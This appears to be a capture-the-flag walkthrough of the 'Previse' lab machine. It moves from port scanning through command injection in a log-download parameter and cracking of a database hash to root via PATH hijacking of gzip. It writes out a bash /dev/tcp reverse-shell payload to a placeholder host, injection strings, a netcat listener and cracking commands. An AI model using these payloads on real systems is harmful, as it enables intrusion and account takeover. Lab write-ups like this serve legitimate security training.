We start with nmap to discover open ports and services.
nmap -sC -sV -oA previse 10.10.11.104
Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-13 12:08 EET
Nmap scan report for 10.10.11.104
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have two open ports, ssh on 22 and http on 80, and their versions have no serious vulnerabilities.
So lets enumerate http port.
The page ends with .php, we know it’s a php app, so when we run a directory bruteforcer we need to specify .php extension.
I tried loggin in with admin:admin, admin:password and tried simple login bypass test’ or 1=1 — — but nothing worked.
So i launched gobuster with raft-medium-words.txt from Seclist
gobuster dir -u http://10.10.11.104/ -w raft-medium-words.txt -t 100 -x php -b 404,403
When i try to access any of these files it redirects me to login.php. BUT when i intercept the request before redirecting, it says 302 Found but i can see the content of the page.
Lets visit /accounts.php
As you can see we can create a new user by submitting the same data as the form has, so to create a new user we need to send a POST request to /accounts.php with POST parameters username and password and confirm.
Now we have a new user embo1:embo1 lets login with it.
And we are logged in. There is SITEBACKUP.ZIP file and a user newguy in FILES page, lets download it.
As the file name says, it’s the backup of the web site.
The config.php file contains mysql credentials.
In logs.php file it uses exec function on the POST parameter delim directly without validation.
So we can intercept the request and do something like this
delim=space;whoami, but it will not reflect in the response so lets try ping our machine
delim=space;ping -c1 <Our IP> (Don't forget to URL encode) and run tcpdump to capture it
sudo tcpdump -n -i tun0 icmp
And we received ICMP echo request, now we have command execution lets get a shell on the box.
Lets replace the ping command with a reverse shell and run a netcat listener.
delim=space;bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
We reveiced a connection and we are on the box as www-data.
After some enumeration i couldn’t find anything but remember the mysql credentials we got before? lets login to mysql using root:mySQL_p@ssw0rd!:)
I found accounts table inside previse database that contains m4lwhere md5crypt hash.
lets save the hash to a file to crack it with hashcat or john.
hashcat -m 500 hash.txt rockyou.txt OR
john hash.txt --wordlist=/opt/rockyou.txt --format=md5crypt I use hashcat on my windows host because it's much faster than john.
Now we have m4lwhere:ilovecody112235! lets ssh into the machine (or just use **su m4lwhere — **).
By running sudo -l we can run /opt/scripts/access_backup.sh as root.
Looking at the script, it’s running gzip without specifying the full path, means we can modify the $PATH variable to make it search for gzip in another directory where we have our own gzip script.
Lets create our gzip script in /dev/shm/ directory.
chmod +x gzip
Now modifying $PATH variable to start with the directory that has our script.
Run a netcat listener
nc nvlp 1337 and run the script
And we are ROOT !